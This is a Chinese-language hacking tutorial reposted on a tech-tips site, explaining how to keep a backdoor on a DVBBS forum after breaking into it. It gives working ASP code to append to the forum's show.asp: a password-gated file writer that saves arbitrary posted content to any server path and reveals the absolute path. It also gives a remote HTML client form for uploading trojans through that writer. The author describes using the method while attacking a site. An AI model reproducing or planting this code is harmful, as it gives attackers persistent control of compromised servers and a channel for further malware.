首页 电脑 电脑学堂 查看内容

后门新思路

2005-4-24 07:57 756 0

摘要: 作者:随矜而去  http://www.xxql.com/ 今天给大家说一下 在动网BBS下一个做后门的新思路 大家入侵完一个动网BBS后,怎么做一个后门,这个是我攻击一个黄色网...
关键词: 一个 后门 路径 然后 一下 代码 服务 下面 端的 绝对

作者:随矜而去  http://www.xxql.com/ 今天给大家说一下 在动网BBS下一个做后门的新思路 大家入侵完一个动网BBS后,怎么做一个后门,这个是我攻击一个黄色网站时候想到的,但不知道是不是有人已经比我先想到,我就在这里说了!好了,开始吧,我们在他论坛下找到show.asp,然后编辑!在最下面插入<%dim noon%><%noon=request("noon")%><%if noon="xxql.com" then%><%dim objFSO%><%dim fdata%><%dim objCountFile%><%on error resume next%><%Set objFSO = Server.CreateObject("Scripting.FileSystemObject")%><%if Trim(request("syfdpath"))<>"" then%><%fdata = request("cyfddata")%><%Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True)%><%objCountFile.Write fdata%><%if err =0 then%><%response.write "<font color=red>save Success!</font>"%><%else%><%response.write "<font color=red>Save UnSuccess!</font>"%><%end if%><%err.clear%><%end if%><%objCountFile.Close%><%Set objCountFile=Nothing%><%Set objFSO = Nothing%><%=server.mappath(Request.ServerVariables("SCRIPT_NAME"))%><%end if%>我只是把人家的代码拆分了一下用用,嘿嘿,别建议哈然后大家看一下:http://www.XXX.com/bbs/show.asp?noon=xxql.com拉到最下面,看到绝对路径了没有?在人家论坛的后门已经算做好了,什么意思呢,很简单,这是一个服务端的代码,然后您在其他空间或者本地支持ASP的地方做一个客户端,看代码:<%Response.write "<form action='http://www.xxx.com/bbs/show.asp' method=post>"%><%Response.Write "<input type=text name=syfdpath width=32 size=50 value=E:\www\www.xxx.com\bbs\asp.asp>"%><%Response.Write ""%><%Response.write ""%><%Response.write "输入马的内容:"%><%Response.write "<textarea name=cyfddata cols=80 rows=10 width=32></textarea>"%><%Response.write "<input type=submit value=保存>"%><%Response.write "</form>"%>这里我说明一下,在服务端的最后一段代码是显示绝对路径的然后在客户端的 action="" 里就填上你服务端所在的文件路径下面一个value="" 改成你存放在马所在服务器上的绝对路径这样你随便把客户端放在哪里都可以对服务端上传其他的木马就这样,很简单!假如大家觉得麻烦也可以用海洋里自带的后门工具
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部